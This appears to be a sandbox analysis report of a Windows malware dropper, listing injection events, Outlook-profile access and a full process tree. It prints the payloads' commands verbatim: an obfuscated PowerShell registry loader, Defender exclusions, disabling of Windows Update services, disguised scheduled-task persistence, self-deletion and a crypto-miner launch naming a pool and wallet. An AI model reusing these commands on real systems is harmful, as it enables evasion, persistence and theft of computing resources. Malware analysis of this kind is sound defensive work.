PID 4888 wrote to memory of 1676 | 4888 | 4363463463464363463463463.exe | 81
PID 4888 wrote to memory of 1676 | 4888 | 4363463463464363463463463.exe | 81
PID 2940 wrote to memory of 1268 | 2940 | BroomSetup.exe | 82
PID 2940 wrote to memory of 1268 | 2940 | BroomSetup.exe | 82
PID 2940 wrote to memory of 1268 | 2940 | BroomSetup.exe | 82
PID 1268 wrote to memory of 3880 | 1268 | cmd.exe | 84
PID 1268 wrote to memory of 3880 | 1268 | cmd.exe | 84
PID 1268 wrote to memory of 3880 | 1268 | cmd.exe | 84
PID 1268 wrote to memory of 4740 | 1268 | cmd.exe | 85
PID 1268 wrote to memory of 4740 | 1268 | cmd.exe | 85
PID 1268 wrote to memory of 4740 | 1268 | cmd.exe | 85
PID 4888 wrote to memory of 2804 | 4888 | 4363463463464363463463463.exe | 86
PID 4888 wrote to memory of 2804 | 4888 | 4363463463464363463463463.exe | 86
PID 4888 wrote to memory of 2740 | 4888 | 4363463463464363463463463.exe | 87
PID 4888 wrote to memory of 2740 | 4888 | 4363463463464363463463463.exe | 87
PID 4888 wrote to memory of 2740 | 4888 | 4363463463464363463463463.exe | 87
PID 4888 wrote to memory of 5080 | 4888 | 4363463463464363463463463.exe | 88
PID 4888 wrote to memory of 5080 | 4888 | 4363463463464363463463463.exe | 88
PID 4888 wrote to memory of 5080 | 4888 | 4363463463464363463463463.exe | 88
PID 4888 wrote to memory of 3896 | 4888 | 4363463463464363463463463.exe | 89
PID 4888 wrote to memory of 3896 | 4888 | 4363463463464363463463463.exe | 89
PID 4888 wrote to memory of 3896 | 4888 | 4363463463464363463463463.exe | 89
PID 4888 wrote to memory of 2816 | 4888 | 4363463463464363463463463.exe | 90
PID 4888 wrote to memory of 2816 | 4888 | 4363463463464363463463463.exe | 90
PID 4888 wrote to memory of 3828 | 4888 | 4363463463464363463463463.exe | 91
PID 4888 wrote to memory of 3828 | 4888 | 4363463463464363463463463.exe | 91
PID 3828 wrote to memory of 3132 | 3828 | ma.exe | 93
PID 3828 wrote to memory of 3132 | 3828 | ma.exe | 93
PID 3132 wrote to memory of 3544 | 3132 | cmd.exe | 94
PID 3132 wrote to memory of 3544 | 3132 | cmd.exe | 94
PID 2804 wrote to memory of 4212 | 2804 | dmi1dfg7n.exe | 95
PID 2804 wrote to memory of 4212 | 2804 | dmi1dfg7n.exe | 95
PID 2804 wrote to memory of 4376 | 2804 | dmi1dfg7n.exe | 102
PID 2804 wrote to memory of 4376 | 2804 | dmi1dfg7n.exe | 102
PID 2804 wrote to memory of 3708 | 2804 | dmi1dfg7n.exe | 99
PID 2804 wrote to memory of 3708 | 2804 | dmi1dfg7n.exe | 99
PID 2804 wrote to memory of 4172 | 2804 | dmi1dfg7n.exe | 98
PID 2804 wrote to memory of 4172 | 2804 | dmi1dfg7n.exe | 98
PID 3708 wrote to memory of 1140 | 3708 | cmd.exe | 104
PID 3708 wrote to memory of 1140 | 3708 | cmd.exe | 104
PID 4376 wrote to memory of 4552 | 4376 | cmd.exe | 105
PID 4376 wrote to memory of 4552 | 4376 | cmd.exe | 105
PID 3708 wrote to memory of 1268 | 3708 | cmd.exe | 106
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
outlook_office_path 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-3934047325-4097474570-3437169968-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | Setup.exe
outlook_win_path 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-3934047325-4097474570-3437169968-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | Setup.exe
Processes
C:\Windows\system32\lsass.exe (PID 644)
  cmdline: C:\Windows\system32\lsass.exe
  C:\Windows\system32\WerFault.exe (PID 4212)
    cmdline: C:\Windows\system32\WerFault.exe -u -p 644 -s 3912
C:\Windows\system32\winlogon.exe (PID 588)
  cmdline: winlogon.exe
  C:\Windows\system32\dwm.exe (PID 996)
    cmdline: "dwm.exe"
    - Suspicious use of FindShellTrayWindow
  C:\Windows\System32\dllhost.exe (PID 928)
    cmdline: C:\Windows\System32\dllhost.exe /Processid:{9c4a676d-1585-43bc-bef4-348fd88bcbc0}
  C:\Windows\SysWOW64\dllhost.exe (PID 3092)
    cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{cecbf5ca-5b11-4d4d-9963-43c2df7ebbf4}
  C:\Windows\system32\WerFault.exe (PID 2844)
    cmdline: C:\Windows\system32\WerFault.exe -u -p 588 -s 924
c:\windows\system32\svchost.exe (PID 1128)
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s Schedule
  c:\windows\system32\taskhostw.exe (PID 3204)
    cmdline: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (PID 2944)
    cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
  C:\Program Files\Google\Chrome\updater.exe (PID 3544)
    cmdline: "C:\Program Files\Google\Chrome\updater.exe"
    - Executes dropped EXE
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 708)
      cmdline: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      C:\Windows\System32\Conhost.exe (PID 4552)
        cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      C:\Windows\system32\WerFault.exe (PID 676)
        cmdline: C:\Windows\system32\WerFault.exe -u -p 708 -s 408
        - Suspicious use of NtCreateProcessExOtherParentProcess
    C:\Windows\system32\cmd.exe (PID 4704)
      cmdline: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      C:\Windows\system32\sc.exe (PID 1060)
        cmdline: sc stop UsoSvc
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 808)
        cmdline: sc stop WaaSMedicSvc
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 4224)
        cmdline: sc stop wuauserv
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 1720)
        cmdline: sc stop bits
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 4152)
        cmdline: sc stop dosvc
        - Launches sc.exe
      C:\Windows\system32\reg.exe (PID 60)
        cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
      C:\Windows\system32\reg.exe (PID 1524)
        cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
      C:\Windows\system32\reg.exe (PID 3744)
        cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
      C:\Windows\system32\reg.exe (PID 884)
        cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
      C:\Windows\system32\reg.exe (PID 4544)
        cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1212 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4652
-
-
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵PID:1228
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵PID:4224
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵PID:3760
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵PID:3880
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵PID:616
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe xtrjicqmdliu3⤵PID:4052
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"4⤵
- Drops file in Program Files directory
PID:620
-
-
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵PID:844
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor4⤵
- Detects videocard installed
PID:4220
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe wvhbfinhdckusjju 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeXwQ/O4+due3etuok0KCy6TAeBBK2Zj7dzTkc9P7Txuspl/ztFHeT1vDsXwtgxIFZnxGXI+P7h6Wy2BaqsXFRrbRIyylpVUfDVtjurLuTI6hfYZYlaT2c8T3z2D8KilAioXHHI3GdcX8L+5AQJHhaF3EikxjkII2qRl4IAJt0ne1Kthho/EoWoWqiJ8V46anYGIeeueaKL6G4gUS0jG8bW+uOPYpliibsIQvftJQy3GdQNbdmaQoQosbMtF/zsQIOPYtzoBcdM/sdKVWCIsST/Py6kltT+qpekCzJYBFF4LST+8+EmmopPFkm4CPe5KhMiY/+g/sQ7d50uqIjFwwoHwsdnFS1l7B7kznzCIpeqO/4VPcOjXZ8D/gqWFx/7uyyvuxXByWtdfg2SHIbTo9ax767hx8DEZJobkKiCLCF5s3S9KZPJ6oc8SVkEHvmPn3ocLOCMVNSrrmyVksnNDnuU8b1vWVxnieD7xm0UnpffWA=3⤵PID:4352
-
-
-
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE  [PID 2772]
    cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
c:\windows\system32\svchost.exe  [PID 1168]
  cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
c:\windows\system32\svchost.exe  [PID 1500]
  cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
c:\windows\system32\svchost.exe  [PID 2432]
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s WpnService
c:\windows\system32\svchost.exe  [PID 2696]
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s Browser
C:\Windows\Explorer.EXE  [PID 3380]
  cmdline: C:\Windows\Explorer.EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe  [PID 4888]
    cmdline: "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
    - Modifies system certificate store
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\Conhost.exe  [PID 320]
      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Users\Admin\AppData\Local\Temp\Files\jopacrypt.exe  [PID 2660]
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Files\jopacrypt.exe"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious use of WriteProcessMemory
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  [PID 5028]
        cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup9.exe  [PID 3552]
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup9.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe  [PID 2940]
        cmdline: C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
        - Executes dropped EXE
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\cmd.exe  [PID 1268]
          cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
          - Suspicious use of WriteProcessMemory
          C:\Windows\SysWOW64\chcp.com  [PID 3880]
            cmdline: chcp 1251
          C:\Windows\SysWOW64\schtasks.exe  [PID 4740]
            cmdline: schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
            - Creates scheduled task(s)
      C:\Users\Admin\AppData\Local\Temp\nsd829F.tmp  [PID 4372]
        cmdline: C:\Users\Admin\AppData\Local\Temp\nsd829F.tmp
        - Executes dropped EXE
    C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe  [PID 1676]
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
      - Executes dropped EXE
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of AdjustPrivilegeToken
    C:\Users\Admin\AppData\Local\Temp\Files\dmi1dfg7n.exe  [PID 2804]
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Files\dmi1dfg7n.exe"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Drops file in Program Files directory
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 4212]
        cmdline: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 4172]
        cmdline: powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\SYSTEM32\cmd.exe  [PID 3708]
        cmdline: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\powercfg.exe  [PID 1140]
          cmdline: powercfg /x -hibernate-timeout-ac 0
          - Suspicious use of AdjustPrivilegeToken
        C:\Windows\system32\powercfg.exe  [PID 1268]
          cmdline: powercfg /x -hibernate-timeout-dc 0
          - Suspicious use of AdjustPrivilegeToken
        C:\Windows\system32\powercfg.exe  [PID 1580]
          cmdline: powercfg /x -standby-timeout-ac 0
          - Suspicious use of AdjustPrivilegeToken
        C:\Windows\system32\powercfg.exe  [PID 1288]
          cmdline: powercfg /x -standby-timeout-dc 0
          - Suspicious use of AdjustPrivilegeToken
      C:\Windows\SYSTEM32\cmd.exe  [PID 4376]
        cmdline: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\sc.exe  [PID 4552]
          cmdline: sc stop UsoSvc
          - Launches sc.exe
        C:\Windows\system32\sc.exe  [PID 4812]
          cmdline: sc stop WaaSMedicSvc
          - Launches sc.exe
        C:\Windows\system32\sc.exe  [PID 3696]
          cmdline: sc stop wuauserv
          - Launches sc.exe
        C:\Windows\system32\sc.exe  [PID 4876]
          cmdline: sc stop bits
          - Launches sc.exe
        C:\Windows\system32\sc.exe  [PID 2848]
          cmdline: sc stop dosvc
          - Launches sc.exe
        C:\Windows\system32\reg.exe  [PID 4404]
          cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        C:\Windows\system32\reg.exe  [PID 600]
          cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        C:\Windows\system32\reg.exe  [PID 756]
          cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
          - Modifies security service
        C:\Windows\system32\reg.exe  [PID 1912]
          cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        C:\Windows\system32\reg.exe  [PID 1884]
          cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 4124]
        cmdline: powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        C:\Windows\system32\schtasks.exe  [PID 4224]
          cmdline: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
      C:\Windows\system32\dialer.exe  [PID 4308]
        cmdline: C:\Windows\system32\dialer.exe
        - Drops file in Windows directory
    C:\Users\Admin\AppData\Local\Temp\Files\75d8077636ee1ec7b44f33cfdc65dc4a5b96d4c0b9ac3df0879b97e2bae1f9dd.exe  [PID 2740]
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Files\75d8077636ee1ec7b44f33cfdc65dc4a5b96d4c0b9ac3df0879b97e2bae1f9dd.exe"
      - Executes dropped EXE
      - Checks SCSI registry key(s)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
    C:\Users\Admin\AppData\Local\Temp\Files\plaza.exe  [PID 5080]
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Files\plaza.exe"
      - Executes dropped EXE
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetWindowsHookEx
    C:\Users\Admin\AppData\Local\Temp\Files\v2.exe  [PID 3896]
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Files\v2.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of SetThreadContext
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  [PID 1056]
        cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    C:\Users\Admin\AppData\Local\Temp\Files\Setup.exe  [PID 2816]
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Files\Setup.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Accesses Microsoft Outlook profiles
      - Suspicious behavior: EnumeratesProcesses
      - outlook_office_path
      - outlook_win_path
      C:\Windows\System32\cmd.exe  [PID 2308]
        cmdline: "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\Setup.exe"
        C:\Windows\system32\PING.EXE  [PID 2240]
          cmdline: ping 1.1.1.1 -n 1 -w 3000
          - Runs ping.exe
    C:\Users\Admin\AppData\Local\Temp\Files\ma.exe  [PID 3828]
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\cmd.exe  [PID 3132]
        cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpAC7C.tmp.bat""
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\timeout.exe  [PID 3544]
          cmdline: timeout 3
          - Delays execution with timeout.exe
        C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe  [PID 2000]
          cmdline: "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - Suspicious use of AdjustPrivilegeToken
          C:\Windows\System32\cmd.exe  [PID 772]
            cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
            C:\Windows\system32\schtasks.exe  [PID 1048]
              cmdline: schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
              - Creates scheduled task(s)
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe  [PID 1664]
            cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
            - Suspicious use of FindShellTrayWindow
    C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe  [PID 2192]
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"
      - Executes dropped EXE
    C:\Users\Admin\AppData\Local\Temp\Files\Cheat.exe  [PID 1200]
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Files\Cheat.exe"
C:\Windows\system32\DllHost.exe  [PID 1696]
  cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe  [PID 3164]
    cmdline: C:\Windows\system32\WerFault.exe -u -p 1696 -s 1028
C:\Windows\System32\InstallAgent.exe  [PID 2152]
  cmdline: C:\Windows\System32\InstallAgent.exe -Embedding
C:\Windows\system32\DllHost.exe  [PID 408]
  cmdline: C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\ApplicationFrameHost.exe  [PID 1408]
  cmdline: C:\Windows\system32\ApplicationFrameHost.exe -Embedding
C:\Windows\system32\DllHost.exe  [PID 5104]
  cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe  [PID 5044]
    cmdline: C:\Windows\system32\WerFault.exe -u -p 5104 -s 724
c:\windows\system32\svchost.exe  [PID 2676]
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe  [PID 2316]
  cmdline: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  - Modifies data under HKEY_USERS
C:\Windows\system32\svchost.exe  [PID 4456]
  cmdline: C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
c:\windows\system32\svchost.exe  [PID 5112]
  cmdline: c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
c:\windows\system32\svchost.exe  [PID 4916]
  cmdline: c:\windows\system32\svchost.exe -k localservice -s CDPSvc
C:\Windows\System32\RuntimeBroker.exe  [PID 3924]
  cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
c:\windows\system32\svchost.exe  [PID 3264]
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
c:\windows\system32\svchost.exe  [PID 3124]
  cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
c:\windows\system32\sihost.exe  [PID 3112]
  cmdline: sihost.exe
C:\Windows\system32\wbem\unsecapp.exe  [PID 2824]
  cmdline: C:\Windows\system32\wbem\unsecapp.exe -Embedding
c:\windows\system32\svchost.exe  [PID 2440]
  cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
c:\windows\system32\svchost.exe  [PID 2416]
  cmdline: c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
C:\Windows\sysmon.exe  [PID 2392]
  cmdline: C:\Windows\sysmon.exe
c:\windows\system32\svchost.exe  [PID 2352]
  cmdline: c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
c:\windows\system32\svchost.exe  [PID 2296]
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
c:\windows\system32\svchost.exe  [PID 2276]
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
c:\windows\system32\svchost.exe  [PID 2268]
  cmdline: c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
c:\windows\system32\svchost.exe  [PID 2108]
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
c:\windows\system32\svchost.exe  [PID 2060]
  cmdline: c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
C:\Windows\System32\spoolsv.exe  [PID 984]
  cmdline: C:\Windows\System32\spoolsv.exe
c:\windows\system32\svchost.exe  [PID 1980]
  cmdline: c:\windows\system32\svchost.exe -k appmodel -s StateRepository
c:\windows\system32\svchost.exe  [PID 1876]
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
C:\Windows\system32\svchost.exe  [PID 1756]
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe  [PID 1736]
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
